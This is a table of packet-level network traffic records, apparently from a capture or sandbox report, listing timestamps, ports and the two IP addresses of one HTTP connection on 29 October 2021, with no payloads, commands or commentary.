Oct 29, 2021 20:50:55.712033987 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.712050915 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.712081909 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.712372065 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.712403059 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.712522030 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.712539911 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.712553024 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.712584019 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.712635994 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.712657928 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.712680101 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.712688923 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.712694883 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.712716103 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.712724924 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.712738991 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.712762117 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.712764025 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.712775946 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.712820053 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.760246038 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.760273933 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.760298014 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.760319948 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.760343075 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.760361910 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.760366917 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.760381937 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.760425091 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.760464907 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.760467052 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.760505915 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.760528088 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.760544062 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.760546923 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.760597944 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.760890007 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.760919094 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.760965109 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.761046886 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761065006 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761143923 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.761173964 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761198044 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761215925 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761231899 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761249065 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.761284113 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.761482000 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761509895 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761533976 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761548042 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761593103 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761605978 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.761615038 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761624098 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.761653900 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761662006 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.761668921 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761687994 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761713982 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.761727095 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761746883 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761763096 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761770964 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.761785984 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761811018 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.761852026 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761878967 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761894941 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.761894941 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.761934042 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.762110949 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762132883 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762156010 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762171984 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762178898 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.762190104 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762217999 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.762273073 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762299061 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762315989 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762324095 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.762348890 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762361050 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.762373924 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762397051 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762411118 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762418032 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.762463093 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.762643099 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762666941 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762701988 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762711048 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.762726068 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762748957 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762765884 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.762773991 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762789965 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.762814045 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.763057947 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.763112068 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.763118029 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.763142109 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.763156891 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.763195992 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.810473919 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810507059 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810532093 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810555935 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810580969 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810604095 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810621977 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810627937 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.810652971 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810677052 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810700893 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810717106 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810730934 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.810739994 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810764074 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810767889 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.810787916 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810812950 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810818911 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.810841084 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810862064 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.810863018 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810888052 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810905933 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.810928106 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810952902 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.810972929 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.810976982 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811002970 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811019897 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.811060905 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811086893 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811103106 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811110973 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.811126947 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811151028 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.811151981 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811177969 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811192989 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811197042 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.811244011 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.811398029 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811423063 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811448097 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811464071 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811505079 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.811556101 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.811568975 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811594009 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811616898 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811641932 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811644077 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.811664104 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811681032 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.811687946 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811700106 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811777115 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.811922073 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811949015 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811973095 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.811988115 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.812000990 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.812021971 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.812099934 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.812125921 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.812146902 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.812149048 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.812165022 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.812212944 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.812217951 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.812242985 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.812258959 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.812491894 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.812513113 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.812532902 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.812558889 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.812577009 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.812623024 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.812680006 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.812696934 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.812721014 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.812730074 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.812746048 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.812769890 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.813704967 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.813728094 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.813821077 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.860589027 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860627890 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860651970 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860677004 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860703945 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860728979 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860744953 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860769987 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860795021 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860806942 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.860819101 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860836983 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860878944 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860899925 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.860907078 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860932112 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860935926 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.860950947 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860960960 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.860975981 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.860999107 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.861006021 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.861022949 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.861038923 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.861046076 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.861071110 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.861188889 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.861213923 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.861264944 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.861284018 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.861301899 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.861347914 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.861612082 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.861639977 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.861663103 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.861687899 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.861700058 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.861711979 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.861747026 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.861753941 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.861769915 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.861794949 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.861959934 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.862004042 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.862019062 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.862029076 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.862046003 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.862093925 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.862149954 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.862175941 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.862198114 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.862200975 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.862216949 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.862240076 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.862447023 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.862473965 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.862500906 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.862570047 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.862626076 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.862689018 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.862948895 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863003969 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.863012075 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863037109 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863078117 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.863095045 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863120079 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863142967 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863157034 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.863158941 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863183022 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863207102 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.863337040 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863363028 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863387108 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.863387108 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863410950 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863425970 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.863435030 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863451958 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863471985 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.863491058 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863513947 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863529921 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.863540888 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863558054 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.863605022 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.870057106 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.910185099 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910223007 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910289049 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.910320044 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910346985 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910365105 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.910372019 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910398960 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910415888 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910425901 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.910439968 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910465002 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910465956 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.910489082 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910509109 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.910512924 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910537958 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910552979 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.910562038 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910579920 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910599947 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910609007 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.910623074 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910646915 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910648108 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.910664082 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.910686970 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.911463022 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911498070 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911521912 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911542892 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911545992 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.911567926 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911575079 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.911592007 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911609888 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911633968 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911643028 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.911658049 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911669970 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.911679983 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911700964 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911703110 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.911724091 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911742926 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.911748886 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911766052 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911789894 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911813974 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.911813974 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911843061 CEST	80	49866	45.141.84.21	192.168.2.4
